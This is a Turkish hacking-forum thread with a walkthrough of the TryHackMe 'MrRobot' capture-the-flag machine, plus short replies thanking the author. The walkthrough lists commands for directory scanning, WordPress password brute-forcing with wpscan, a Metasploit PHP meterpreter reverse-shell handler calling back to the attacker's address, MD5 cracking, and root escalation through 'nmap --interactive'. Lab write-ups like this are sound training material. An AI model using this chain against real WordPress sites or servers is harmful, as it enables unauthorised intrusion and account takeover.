THT DUYURU

 
 
Capture The Flag Vulnerable VM Walkthrough & Capture The Flag (CTF) Writeup Yazabileceğiniz Bölüm

Seçenekler

TryHackMe MrRobot Çözümü / Cold-Shadow

Cold-Shadow - ait Kullanıcı Resmi (Avatar)
Kıdemli Üye
Üyelik tarihi:
02/2015
Yaş:
23
Mesajlar:
3.425
Konular:
180
Teşekkür (Etti):
866
Teşekkür (Aldı):
1900
Ticaret:
(0) %
9
2327
01-05-2020 00:14
#1
Merhaba dostlar bugün sizlerle TryHackMe sitesinin bize sunduğu MrRobot adlı makineyi çözeceğiz.

İlgili makineye gitmek için: https://tryhackme.com/room/mrrobot

Öncelikle "nmap" taraması yapıp hangi portların açık olduğuna bakalım.


Kod:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 20:41 +03
Nmap scan report for http://10.10.93.8/
Host is up (0.16s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
443/tcp open   https

Nmap done: 1 IP address (1 host up) scanned in 12.04 seconds
Nmap çıktımız bu şekilde. 80 portu açık görünüyor. Bakalım hemen neler varmış



Ekranda görünenleri deneyip bişey elde edemedik.

Daha sonra "Gobuster" aracı ile dizinleri tarıyoruz. Bakalım neler elde edebileceğiz.



Kod:
gobuster dir -u http://10.10.93.8/ -w /use/share/dirb/wordlists/small.txt
"login" i görüp adrese gidiyoruz.



Göründüğü gibi WordPress kurulu. Hemen "WpScan" aracı ile tarıyorum.



Robots.txt dosyası olduğunu görüyorum ve bakıyorum.

BİNGO!!
İlk Flag'imizi böyle bulmuş oluyoruz.




Aynı zamanda "fsocity.dic" adlı dosyayı indiriyorum

Daha sonra "wp-login.php" adresinde bir kaç deneme yapıyorum ve "ERROR: Invalid username." hatasını alıyorum. Daha sonra dizi ve baş rolümüz aklıma geliyor. "*****" kullanıcı adını deniyorum.

Bu sefer aldığım hata değişiyor ve karşıma "
ERROR: The password you entered for the username ***** is incorrect." hatası çıkıyor. Kullanıcı adımızı bulduk. Peki şifre? indirdiğimiz "fsocity" dosyasına baktığım zaman "bunlar şifre olabilir" diyorum. Ama 800.000 küsür satırdan oluşuyor dosya. Bir birini tekrar eden şeyler olabileceğini düşünüp kısaltıyorum ve "password.txt" olarak kaydediyorum.
Kod:
 sort -u fsocity.dic > password.txt
Yine aşağıdaki komutla uzunluğuna baktığımda "11451" satıra düştüğünü görüyorum

Kod:
wc -l password.txt
Ve yine "WpScan" aracıyla "Brute Force" yapıyorum.
Şifre karşımıza çıkıyor.

Kod:
wpscan --url http://10.10.93.8/wp-login.php --passwords /root/TryHackME/MrRobot/password.txt --usernames *****
Ve Daha sonra "msfvenom" ile shell oluşturuyorum.


Daha sonra "msfconsole" (m-e-t-a-sploit) aracımı kullanıp gerekli ayarları yaptıktan sonra login olduğum WordPress sistemine shellimi upload ediyorum. Msfconsole aracımdan payloadı çalıştırıyorum.


Kod:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 10.9.43.118
ser lport 4444
run
Daha sonra "home/robot" klasörü içinde flag'ımı görüyorum ancak erişimim yok.
Ancak farklı bir kullanıcı adı ve MD5 görüyorum.
MD5'i online sitelerde decrytp ediyorum ve şifreyi çözüyorum.


Kod:
abcdefghijklmnopqrstuvwxyz
Kullanıcı adı:robot
Şifre:abcdefghijklmnopqrstuvwxyz
robot kullanıcısına geçmek istediğimde hata alıyorum ve biraz araştırdıktan sonra interactive shell'e çevirerek root olabileceğimi görüyorum.

Ve şu komutu çalıştırıyorum


Kod:
import pty; pty.spawn("/bin/sh")
Ve BİNGO!
Daha sonra "nmap --interactive" diyip "root" klasörü içindeki son flag'imi okuyorum.

Kod:
 nmap --interactive
Okuduğunuz için teşekkürler, umarım yararlı olabilmişimdir.



Not: Sonlarda makinenin süresini uzatmayı unuttuğum için makineyi tekrar başlattığımda ip adresi değişti.

---------------------
Konu P4RS tarafından (07-07-2020 13:10 Saat 13:10 ) değiştirilmiştir.
PourLa - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
03/2016
Nereden:
Mesajlar:
1.668
Konular:
310
Teşekkür (Etti):
630
Teşekkür (Aldı):
872
Ticaret:
(0) %
01-05-2020 00:44
#2
Ellerin dert görmesin
---------------------
PourLa
Html/Css > Python > C ve C++
( }-----{ TÜRK HACK TEAM }-----{ )
Twitter | Telegram | İnstagram
P4RS - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2017
Nereden:
Ankara
Mesajlar:
5.139
Konular:
626
Teşekkür (Etti):
1779
Teşekkür (Aldı):
3708
Ticaret:
(0) %
01-05-2020 01:08
#3
Ellerine sağlık fakat keşke flag değerlerini kapatsaydınız böylelikle writeup kısmına link olarak ekleyebilirdiniz. Birde yazının rengini farklı bir tonda yapar mısınız?
---------------------


𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗
Cold-Shadow - ait Kullanıcı Resmi (Avatar)
Kıdemli Üye
Üyelik tarihi:
02/2015
Yaş:
23
Mesajlar:
3.425
Konular:
180
Teşekkür (Etti):
866
Teşekkür (Aldı):
1900
Ticaret:
(0) %
01-05-2020 01:21
#4
Alıntı:
PourLa´isimli üyeden Alıntı Mesajı göster
Ellerin dert görmesin
Teşekkür ederim PourLa
Alıntı:
"P4RS´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık fakat keşke flag değerlerini kapatsaydınız böylelikle writeup kısmına link olarak ekleyebilirdiniz. Birde yazının rengini farklı bir tonda yapar mısınız?
Teşekkür ederim P4RS DarkRed'den Red'e aldım
Ancak link olarak ekleme kısmını anlayamadım kusura bakma, kafam çok dolu
---------------------
P4RS - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2017
Nereden:
Ankara
Mesajlar:
5.139
Konular:
626
Teşekkür (Etti):
1779
Teşekkür (Aldı):
3708
Ticaret:
(0) %
01-05-2020 01:34
#5
Alıntı:
Cold-Shadow´isimli üyeden Alıntı Mesajı göster
Teşekkür ederim PourLa

Teşekkür ederim P4RS DarkRed'den Red'e aldım
Ancak link olarak ekleme kısmını anlayamadım kusura bakma, kafam çok dolu
Tryhackme de makinenin üstünde Writeups kısmı var. Oraya tıkladığında makineyi çözen kişilerin writeup'ları var. Oraya kendi yaptığınız bir sitedeki writeup'ı ekleyebiliyorsunuz. Onu kast ettim
---------------------


𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗
Cold-Shadow - ait Kullanıcı Resmi (Avatar)
Kıdemli Üye
Üyelik tarihi:
02/2015
Yaş:
23
Mesajlar:
3.425
Konular:
180
Teşekkür (Etti):
866
Teşekkür (Aldı):
1900
Ticaret:
(0) %
01-05-2020 01:40
#6
Alıntı:
P4RS;9054739]Tryhackme de makinenin üstünde [B][COLOR="Red´isimli üyeden Alıntı
Writeups[/COLOR][/B] kısmı var. Oraya tıkladığında makineyi çözen kişilerin writeup'ları var. Oraya kendi yaptığınız bir sitedeki writeup'ı ekleyebiliyorsunuz. Onu kast ettim
Tamamdır Yarın o zaman konuyu biraz daha düzenleyebilirsem düzenler eklerim
---------------------
Codx - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
07/2017
Mesajlar:
310
Konular:
33
Ticaret:
(0) %
20-05-2020 22:10
#7
Ellerine sağlık.
0x762 - ait Kullanıcı Resmi (Avatar)
-
Üyelik tarihi:
04/2016
Mesajlar:
38.721
Konular:
476
Teşekkür (Etti):
1
Teşekkür (Aldı):
4529
Ticaret:
(0) %
20-05-2020 22:11
#8
Eline saglik
Cold-Shadow Teşekkür etti.
Cold-Shadow - ait Kullanıcı Resmi (Avatar)
Kıdemli Üye
Üyelik tarihi:
02/2015
Yaş:
23
Mesajlar:
3.425
Konular:
180
Teşekkür (Etti):
866
Teşekkür (Aldı):
1900
Ticaret:
(0) %
25-05-2020 12:32
#9
Alıntı:
Codx´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık.
Teşekkür ederim
Alıntı:
0x762´isimli üyeden Alıntı Mesajı göster
Eline saglik
Teşekkür ederim abi
BayRobot - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2020
Mesajlar:
117
Konular:
6
Teşekkür (Etti):
0
Teşekkür (Aldı):
68
Ticaret:
(0) %
28-05-2020 18:36
#10
Anlatımın mükemmel. Başarılarının devamını dilerim. Bu yoldan asla vazgeçme!
--------------------- MERAK EDİLECEK YANIM YOK BENDE İNSANIM 😈

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler